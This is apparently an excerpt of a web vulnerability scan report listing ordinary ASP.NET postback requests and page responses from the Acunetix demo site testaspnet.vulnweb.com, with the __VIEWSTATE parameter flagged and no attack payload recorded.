Request Body - size: 1,089 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8311&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgCADDfSpNoIZGRkDS03NpirjroeLRfjdTq%2F%2B07AyE0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLdlaYPAuKJ2soFAv6Q%2FOMBAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAgKo4P6HCgKo4P6HCgKo4NLsCAKo4NLsCAKo4MYDAqjgxgMCjffQqAMCjffQqAMCjffEzwwCjffEzwwCjff44gUCjff44gUCjffsuQ0CjffsuQ0CjfeA3AYCjfeA3AYCjfe08w8Cjfe08w8CjfeolgcCjfeolgcCjffcKgKN99wqAo33sJINAo33sJINAo33pKkGAo33pKkGAuadt94JAuadt94JAuadq%2FUCAuadq%2FUCAuad34kKAuad34kKAuad86wDAuad86wDAuad58MMAuad58MMAuadm%2BYFAuadm%2BYFAuadj70NAuadj70NAuado9AGAuado9AGAuadl7kDAuadl7kDAuadi9wMAuadi9wMAvuklcUPAvuklcUPAvukiZgHAvukiZgHAvukvT8C%2B6S9PwL7pNHTCQL7pNHTCQL7pMX2AgL7pMX2AjVOJabk7RHK%2BmlCsaFGFpWvQsBR
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:00:10 GMT Content-Length: 12593
Response Body - size: 12,593 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgCADDfSpNoIZGRkDS03NpirjroeLRfjdTq/+07AyE0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLdlaYPAuKJ2soFAv6Q/OMBAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAgKo4P6HCgKo4P6HCgKo4NLsCAKo4NLsCAKo4MYDAqjgxgMCjffQqAMCjffQqAMCjffEzwwCjffEzwwCjff44gUCjff44gUCjffsuQ0CjffsuQ0CjfeA3AYCjfeA3AYCjfe08w8Cjfe08w8CjfeolgcCjfeolgcCjffcKgKN99wqAo33sJINAo33sJINAo33pKkGAo33pKkGAuadt94JAuadt94JAuadq/UCAuadq/UCAuad34kKAuad34kKAuad86wDAuad86wDAuad58MMAuad58MMAuadm+YFAuadm+YFAuadj70NAuadj70NAuado9AGAuado9AGAuadl7kDAuadl7kDAuadi9wMAuadi9wMAvuklcUPAvuklcUPAvukiZgHAvukiZgHAvukvT8C+6S9PwL7pNHTCQL7pNHTCQL7pMX2AgL7pMX2AjVOJabk7RHK+mlCsaFGFpWvQsBR" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:White" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8315&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgCAs%2BD2p9oIZGRkX73%2FN98tpI6TLAGvznB4KjjlF38%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLWhf%2BEBwLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gLC914%2FpSjBDFQMf23reIYHsZeQlw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:11:45 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgCAs+D2p9oIZGRkX73/N98tpI6TLAGvznB4KjjlF38=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWhf+EBwLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gLC914/pSjBDFQMf23reIYHsZeQlw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:White" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
